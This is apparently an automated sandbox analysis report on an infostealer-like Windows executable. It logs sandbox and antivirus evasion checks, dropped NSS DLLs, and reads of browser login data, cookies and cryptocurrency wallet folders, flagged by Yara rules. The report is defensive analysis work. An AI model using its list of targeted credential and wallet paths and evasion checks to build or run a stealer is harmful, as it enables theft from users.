Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: freebl3.pdb source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source: Binary string: mozglue.pdbP source: mozglue.dll.1.dr
Source: Binary string: freebl3.pdbp source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source: Binary string: nss3.pdb@ source: nss3.dll.1.dr
Source: Binary string: C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe
Source: Binary string: softokn3.pdb@ source: softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: 1C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe
Source: Binary string: nss3.pdb source: nss3.dll.1.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.1.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.1.dr

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.400000.0.unpack
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00418110 GetEnvironmentVariableA,_memset,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418110
Source: initial sample Static PE information: section name: .text entropy: 7.723744016228705
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 6012
Source: unknown Network traffic detected: HTTP traffic on port 6012 -> 49774
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00424B20 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress, 1_2_00424B20
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00401070 GetSystemInfo, 1_2_00401070
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412170 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412170
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004171C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA, 1_2_004171C0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412450
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412690
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041B7E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0041B7E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040C8E0 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0040C8E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00424960 FindFirstFileW,FindNextFileW,FindNextFileW, 1_2_00424960
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004169A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_004169A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040AAC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_0040AAC0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00416BB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00416BB0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040DE60 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, 1_2_0040DE60
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: file.exe, 00000001.00000002.3698810477.0000000004090000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: VMware
Source: file.exe, 00000001.00000002.3721084273.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpcg
Source: file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: BDISPLAYVMwareVMwareX3NS7I
Source: file.exe, 00000001.00000002.3707864447.0000000004670000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.3698810477.0000000004090000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: DISPLAYVMware
Source: file.exe, 00000001.00000002.3707864447.0000000004670000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW#
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00430728 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00430728
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00418110 GetEnvironmentVariableA,_memset,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418110
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041B050 StrCmpCA,StrCmpCA,StrCmpCA,_memset,lstrcat,lstrcat,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,GetProcessHeap,RtlAllocateHeap,StrCmpCA,lstrcat,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen, 1_2_0041B050
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004352B7 SetUnhandledExceptionFilter, 1_2_004352B7

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00417FA0 _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle, 1_2_00417FA0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, 1_2_0041F650
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_0043705F
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 1_2_00437154
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 1_2_004371FB
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 1_2_00437256
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 1_2_0043B3E2
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 1_2_00437427
Source: C:\Users\user\Desktop\file.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_004374E7
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_0043B4BC
Source: C:\Users\user\Desktop\file.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0043754E
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 1_2_0043758A
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA,wsprintfA,_memset,LocalFree, 1_2_0041F6B8
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_0043688A
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00420970 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 1_2_00420970
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041F5B0 GetUserNameA, 1_2_0041F5B0
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: file.exe, 00000001.00000002.3721084273.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3698626677.0000000002606000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match File source: 1.2.file.exe.4100e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.4100e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7912, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Source: file.exe String found in binary or memory: Electrum-LTC
Source: file.exe, 00000001.00000002.3701045776.00000000043F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: file.exe String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000001.00000002.3701045776.00000000043F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: JaxxLiberty
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: file.exe String found in binary or memory: \Exodus\backups
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: Exodus\exodus.wallet
Source: file.exe String found in binary or memory: default_wallet
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum"
Source: file.exe, 00000001.00000002.3701045776.00000000043F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\.*2
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: multidoge.wallet
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: file.exe String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\9ufvw9sb.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\9ufvw9sb.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: Yara match File source: 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7912, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 1.2.file.exe.4100e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.4100e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7912, type: MEMORYSTR